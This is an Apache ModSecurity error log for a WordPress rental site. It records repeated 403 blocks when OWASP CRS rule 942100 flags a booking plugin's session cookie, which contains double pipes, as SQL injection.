[Mon May 11 22:27:51.935135 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7x3o_DFxNSZVmaX3RMQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:52.533079 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7x3o_DFxNSZVmaX3RMQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:53.139245 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7yXo_DFxNSZVmaX3RMgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:53.139522 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7yXo_DFxNSZVmaX3RMgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:54.277584 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7yXo_DFxNSZVmaX3RMgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:54.532322 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7yno_DFxNSZVmaX3RNQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:54.532601 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7yno_DFxNSZVmaX3RNQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:55.098540 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7yno_DFxNSZVmaX3RNQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:56.037425 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7zHo_DFxNSZVmaX3ROQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:56.037755 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7zHo_DFxNSZVmaX3ROQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:56.431384 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7zHo_DFxNSZVmaX3ROQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:57.123120 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7zXo_DFxNSZVmaX3RQQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:57.123430 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7zXo_DFxNSZVmaX3RQQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:57.734093 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7zXo_DFxNSZVmaX3RQQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:58.345038 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7zno_DFxNSZVmaX3RQwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:58.345331 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7zno_DFxNSZVmaX3RQwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:58.955364 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7zno_DFxNSZVmaX3RQwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:59.745844 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7z3o_DFxNSZVmaX3RRQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:59.746111 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7z3o_DFxNSZVmaX3RRQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:00.356745 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7z3o_DFxNSZVmaX3RRQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:01.319795 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI70Xo_DFxNSZVmaX3RRgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:01.320088 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI70Xo_DFxNSZVmaX3RRgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:01.899135 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI70Xo_DFxNSZVmaX3RRgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:02.155138 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI70no_DFxNSZVmaX3RSQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:02.155426 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI70no_DFxNSZVmaX3RSQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:02.705195 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI70no_DFxNSZVmaX3RSQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:03.257262 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI703o_DFxNSZVmaX3RSwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:03.257542 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI703o_DFxNSZVmaX3RSwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:03.622938 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI703o_DFxNSZVmaX3RSwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:04.844257 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI71Ho_DFxNSZVmaX3RTAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:04.844547 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI71Ho_DFxNSZVmaX3RTAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:05.458450 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI71Ho_DFxNSZVmaX3RTAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:06.235367 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI71no_DFxNSZVmaX3RTwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:06.235632 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI71no_DFxNSZVmaX3RTwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:06.881956 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI71no_DFxNSZVmaX3RTwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:07.250568 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI713o_DFxNSZVmaX3RUAAAAMg"], referer: https://rentparadise.fr/wp-login.php
